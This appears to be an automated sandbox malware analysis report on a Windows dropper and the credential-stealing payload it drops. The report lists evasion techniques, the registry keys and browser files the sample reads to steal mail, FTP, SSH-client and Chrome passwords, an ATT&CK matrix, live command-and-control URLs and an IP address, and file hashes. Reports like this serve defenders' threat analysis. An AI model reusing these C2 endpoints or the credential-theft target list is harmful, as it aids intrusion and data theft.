            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeCode function: 1_2_00401000
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exe TID: 5228Thread sleep count: 200 > 30
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exe TID: 5228Thread sleep time: -12000000s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeCode function: 1_2_00401000
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeCode function: 1_2_004B07DA GetSystemInfo,
            Source: C:\Users\user\Desktop\zlP981oop5.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
            Source: C:\Users\user\Desktop\zlP981oop5.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,
            Source: C:\Users\user\Desktop\zlP981oop5.exeCode function: 0_2_0040290B FindFirstFileW,
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeCode function: 1_2_0040756A _free,_free,FindFirstFileExW,
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeCode function: 1_2_0040761E FindFirstFileExW,FindNextFileW,FindClose,
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeCode function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeThread delayed: delay time: 60000
            Source: C:\Users\user\Desktop\zlP981oop5.exeAPI call chain: ExitProcess graph end node
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeAPI call chain: ExitProcess graph end node
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeCode function: 1_2_00401846 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeCode function: 1_2_00404C25 GetProcessHeap,
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeCode function: 1_2_004024C4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeCode function: 1_2_00406682 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeCode function: 1_2_004B005F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeCode function: 1_2_004B017B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeCode function: 1_2_004B0109 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeCode function: 1_2_004B013E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeCode function: 3_2_0040317B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeCode function: 1_2_0040183A SetUnhandledExceptionFilter,
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeCode function: 1_2_00401846 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeCode function: 1_2_00405CCC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeCode function: 1_2_00401D3D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\gblqfiy.exe protection: execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess created: C:\Users\user\AppData\Local\Temp\gblqfiy.exe C:\Users\user\AppData\Local\Temp\gblqfiy.exe
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeCode function: 1_2_00401A55 cpuid
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeCode function: 1_2_0040171D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
            Source: C:\Users\user\Desktop\zlP981oop5.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeCode function: 3_2_00406069 GetUserNameW,

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 3.2.gblqfiy.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.gblqfiy.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.gblqfiy.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.gblqfiy.exe.a00000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.gblqfiy.exe.400000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000000.255568644.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.512147236.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.259652732.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: gblqfiy.exe PID: 5172, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: gblqfiy.exe PID: 5316, type: MEMORYSTR
            Source: Yara matchFile source: dump.pcap, type: PCAP
            Source: Yara matchFile source: 00000003.00000002.513357933.0000000000658000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeCode function: PopPassword
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeCode function: SmtpPassword
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: Yara matchFile source: 3.2.gblqfiy.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.gblqfiy.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.gblqfiy.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.gblqfiy.exe.a00000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.gblqfiy.exe.400000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000000.255568644.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.512147236.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.259652732.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts1
            Native API
            Path Interception1
            Access Token Manipulation
            1
            Masquerading
            2
            OS Credential Dumping
            1
            System Time Discovery
            Remote Services1
            Email Collection
            Exfiltration Over Other Network Medium1
            Encrypted Channel
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
            System Shutdown/Reboot
            Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts111
            Process Injection
            11
            Virtualization/Sandbox Evasion
            2
            Credentials in Registry
            23
            Security Software Discovery
            Remote Desktop Protocol1
            Archive Collected Data
            Exfiltration Over Bluetooth1
            Ingress Tool Transfer
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
            Access Token Manipulation
            Security Account Manager11
            Virtualization/Sandbox Evasion
            SMB/Windows Admin Shares2
            Data from Local System
            Automated Exfiltration1
            Non-Application Layer Protocol
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
            Process Injection
            NTDS1
            Account Discovery
            Distributed Component Object Model1
            Clipboard Data
            Scheduled Transfer111
            Application Layer Protocol
            SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information
            LSA Secrets1
            System Owner/User Discovery
            SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common2
            Obfuscated Files or Information
            Cached Domain Credentials2
            File and Directory Discovery
            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync17
            System Information Discovery
            Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            zlP981oop5.exe31%VirustotalBrowse
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\gblqfiy.exe30%VirustotalBrowse
            C:\Users\user\AppData\Roaming\C79A3B\B52B3F.exe (copy)30%VirustotalBrowse
            SourceDetectionScannerLabelLinkDownload
            3.0.gblqfiy.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            1.2.gblqfiy.exe.a00000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            3.2.gblqfiy.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
            http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
            http://alphastand.win/alien/fre.php0%URL Reputationsafe
            http://alphastand.trade/alien/fre.php0%URL Reputationsafe
            http://alphastand.top/alien/fre.php0%URL Reputationsafe
            http://www.ibsensoftware.com/0%URL Reputationsafe
            http://www.ibsensoftware.com/0%URL Reputationsafe
            http://171.22.30.147/kelly/five/fre.php14%VirustotalBrowse
            http://171.22.30.147/kelly/five/fre.php100%Avira URL Cloudmalware
            No contacted domains info
            NameMaliciousAntivirus DetectionReputation
            http://kbfvzoboss.bid/alien/fre.phptrue
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://alphastand.win/alien/fre.phptrue
            • URL Reputation: safe
            unknown
            http://alphastand.trade/alien/fre.phptrue
            • URL Reputation: safe
            unknown
            http://alphastand.top/alien/fre.phptrue
            • URL Reputation: safe
            unknown
            http://171.22.30.147/kelly/five/fre.phptrue
            • 14%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://nsis.sf.net/NSIS_ErrorErrorzlP981oop5.exefalse
              high
              http://www.ibsensoftware.com/gblqfiy.exe, gblqfiy.exe, 00000003.00000000.255568644.0000000000400000.00000040.80000000.00040000.00000000.sdmp, gblqfiy.exe, 00000003.00000002.512147236.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              171.22.30.147
              unknownGermany
              33657CMCSUStrue
              Joe Sandbox Version:36.0.0 Rainbow Opal
              Analysis ID:778229
              Start date and time:2023-01-05 08:51:06 +01:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 5m 59s
              Hypervisor based Inspection enabled:false
              Report type:light
              Sample file name:zlP981oop5.exe
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:15
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.spyw.evad.winEXE@6/7@0/1
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:Failed
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
              • HTTP Packets have been reduced
              • TCP Packets have been reduced to 100
              • Excluded IPs from analysis (whitelisted): 209.197.3.8
              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wu-bg-shim.trafficmanager.net
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtDeviceIoControlFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              TimeTypeDescription
              08:52:07API Interceptor382x Sleep call for process: gblqfiy.exe modified
              No context
              No context
              No context
              No context
              No context
              Process:C:\Users\user\Desktop\zlP981oop5.exe
              File Type:data
              Category:dropped
              Size (bytes):127354
              Entropy (8bit):7.970882602293968
              Encrypted:false
              SSDEEP:3072:rwKMZ6eLmyxP6pqtf5BAEQxo32+V5zmNeYGk:rwN/56u5BAj+3zm9V
              MD5:79E30F0557DB22BC1AE0D215A205520B
              SHA1:827CB50CD01A40718412D4171FA13054FE6C1101
              SHA-256:55CB5044F643B72ABCF4EE7751C23CA4D7CEA36E309EF7CE54ABBB961B5CC80D
              SHA-512:8D905E062C78BBAE428F0F322EB1D06D8F082200C94A41C2511CF96F133990D8567F36444856FD0BAB9864A94C604905CF52CF8B1E8EDE6D87565B8F394C157C
              Malicious:false
              Reputation:low
              Preview::|....6.}...B..A.)C.Xa:"..C!..iZ.).....hOF.+..P......O..1P.i...C|?5...y...:......JW...Ls.....c...g-.x..N5..Z.'e....3.-.w.,.TcsR+..G.t..=.u.......Rd@..k.."f#..lsh(....i......}..I\..oJ..4..Q.23.yI.-...n.^.ncZQT.... .....g.A].0.`..8....owbz.2H..\.....1.E..P:...)C.Xa..J.C...i.)....PhOF.+..PQ.....V..1..i..WZ$?../9.d.5..;SX2j...C..u?....n.F7M.3bW{.c.6Uv..N...]..3.-.w....3.c..h~o7..........=.....7.$E...R.I...j.'...0\r.c.m.......>..t.h..V.n3x\I.....zT...%.g>.)Y..}..3..A.x90.`.....@,o....2...\....6..}...wB.$0..}Xa....C.h.i..).....hOF.+..P..9...N...a.i.5..$?.../J.d.J..;S.2j-...C.S..n..n.87M.3/W{.c}6......]..3.-.w....3....h~o7..........=.....7.$E...R.I...j.'...0\r.c.m.......>..t.h...n$x\I.....zT...%.g>.)Y..}..3.g.A].0.`.8...,o....2H..\....6..}...wB..A.)C.Xa,"..C!..iZ.).....hOF.+..P......O..1..i..^.$?[./9.d.5..;S.2j-...C.u.....n.87M.3bW{.c.6.r.....]..3.-.w....3.c..h~o7..........=.....7.$E...R.I...j.'...0\r.c.m.......>..t.h...n$x\I.....zT...%.g>.)Y..}..3.
              Process:C:\Users\user\Desktop\zlP981oop5.exe
              File Type:PE32 executable (console) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):86016
              Entropy (8bit):6.174185361455216
              Encrypted:false
              SSDEEP:1536:hfVo/O++LezMxj8gkJF/5U0X+OXxacX+gYm3dFQ1iY2gpczMisubmfsrH:MJ+LezMhPg5oOXxacX+M3dFQ1iYVALFZ
              MD5:B51AF47CC81518E4CF1128FBBEAE5877
              SHA1:1F042C2F7EE5E516545A818C8C74F6CD5E1C1040
              SHA-256:7E350F4D1E64DC3683DC1AA446151C3C0F4C5F8921063AE48D5ABC20C26E4D35
              SHA-512:B75703EBC171B7EEB42DC4DF8C1E885DBC3DADF4059B01590C1A311A0484B626088087DFAC5E3A144096C00BAB1A774961D6B1BD764EDB891D1A62769A7055E4
              Malicious:true
              Antivirus:
              • Antivirus: Virustotal, Detection: 30%, Browse
              Reputation:low
              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......c.....................n......w.............@..........................................................................>.......................................=...............................................A...............................text...U........................... ..`.rdata...`.......b..................@..@.data........`.......B..............@....00cfg...............L..............@..@.voltbl..............N..................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Users\user\Desktop\zlP981oop5.exe
              File Type:data
              Category:dropped
              Size (bytes):237612
              Entropy (8bit):7.277706725265449
              Encrypted:false
              SSDEEP:3072:1ewKMZ6eLmyxP6pqtf5BAEQxo32+V5zmNeYGAQK1cbJ+LezMhPg5oOXxacX+M3dN:gwN/56u5BAj+3zm9VQK18+y0PvcL6
              MD5:9157E34343EC40870397A2806EC00D77
              SHA1:13CCA70D20FEB7FB08F9486AAE13340131100DFC
              SHA-256:3FECF6DBCF1ECBC83E84AABDFC8780E8412D07672E07D3F50AFFB1A770B1D2A0
              SHA-512:FBF40B00A0EBAEECFB1FB133C8179A2BE22B94BD5CF5ED49FF2A8560F156D559D3F6DA144F523156DAF2614DC055A799369E4534DB88FC64E76F1AB82E61BAA2
              Malicious:false
              Reputation:low
              Preview:.H......,......................../......$G.......G..............................................................................a...........................................................................................................................................................G...................j...........................................................................................................................................y...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Users\user\Desktop\zlP981oop5.exe
              File Type:data
              Category:dropped
              Size (bytes):5784
              Entropy (8bit):7.15339400978258
              Encrypted:false
              SSDEEP:96:Farc6oY5g/DrYuFZk2XO5oSwYdKSi1VwTYd4doFdkOAMiOaTJATS4zw1OlH1l9I:FarcRNNZhX1S95cyEQon1A/FmTS4zw1h
              MD5:B2035FE0B3EFF6F12189D9B0BF82D01A
              SHA1:B4A16B1336C99FF4A3C9C77E9787E32821AFA2C7
              SHA-256:66B85757FD06F3231E05E2D1CD2F32B244DD1A9B71CD816158268A4AF2597A5B
              SHA-512:D73CA7A57DB5D09F08D809F5020B374E6EF651AF68C02ED9E7DC9BB57E75CD910112685093DFAFDA80B641B9F37FF9E392F2709912B803EF46D52D6C881264FE
              Malicious:false
              Reputation:low
              Preview:.005m..f.F<...05o.:......?v>.3.3.<......M.knl.02a..c.E<...42c. ......4.D63.6.3.?.....E.gni.53P..805.p8.q?.2.8.u .a..beabo.H0..v..v.@3.`..i/7.p.6.t(2..g.}.u<..G-.0.3.h.f....w8L$.m.r.D;F...okc..m.;4.q.?.<@.4.0...m..u<f...@%.`4..D'd.O$..A5..=..<r..4M.knl.82a..Q..401ec.t4.M4...D;.D..d580..E9....E....3.u.mje.18e..`W..480.x<.p=.4.4.p-P..6.c.!....D%.|.eX.....+..t..0....e.a..`beP..580.p=.t>.8.5.p,XE..Md.....M9..e...@4......F1..u.|c.....Lq.}<...v<+480.}<;.&<.>..r.^.q8F0....q.^.q8F0...^..M...3uc.....}<F...kloe.=8e...548.r...t..w.(058.q..v..I.0A..q..34.q.p.}..u.{.w....}.p013......u.L.4F".u..04.t.t.q..p.x.u....q.8580..Y...}..E.4D'.q..80.}.t.t..w.p.p...X+AK..M......v.ZXK.J.E.....}.]..O.F.....u.X_.M.M......H...X...K.D.....}.\&....A..B....G...P5..O.E..P....\...Y...K.E..a....B...].4.T.4.q0.p..q..~<1|..x.q.>.t&.u.|1,.t..w.pe..\...w.p..u.T.4.Q.0.}.;.q%..5M%.}.;.qm..tL9.}.5013.6.].5.u...K...P3480..u...dR0.m...D4...B358.q.0342.}.e......dX4R0]<048[3^2^8Z5..p...d.a..
              Process:C:\Users\user\AppData\Local\Temp\gblqfiy.exe
              File Type:PE32 executable (console) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):86016
              Entropy (8bit):6.174185361455216
              Encrypted:false
              SSDEEP:1536:hfVo/O++LezMxj8gkJF/5U0X+OXxacX+gYm3dFQ1iY2gpczMisubmfsrH:MJ+LezMhPg5oOXxacX+M3dFQ1iYVALFZ
              MD5:B51AF47CC81518E4CF1128FBBEAE5877
              SHA1:1F042C2F7EE5E516545A818C8C74F6CD5E1C1040
              SHA-256:7E350F4D1E64DC3683DC1AA446151C3C0F4C5F8921063AE48D5ABC20C26E4D35
              SHA-512:B75703EBC171B7EEB42DC4DF8C1E885DBC3DADF4059B01590C1A311A0484B626088087DFAC5E3A144096C00BAB1A774961D6B1BD764EDB891D1A62769A7055E4
              Malicious:true
              Antivirus:
              • Antivirus: Virustotal, Detection: 30%, Browse
              Reputation:low
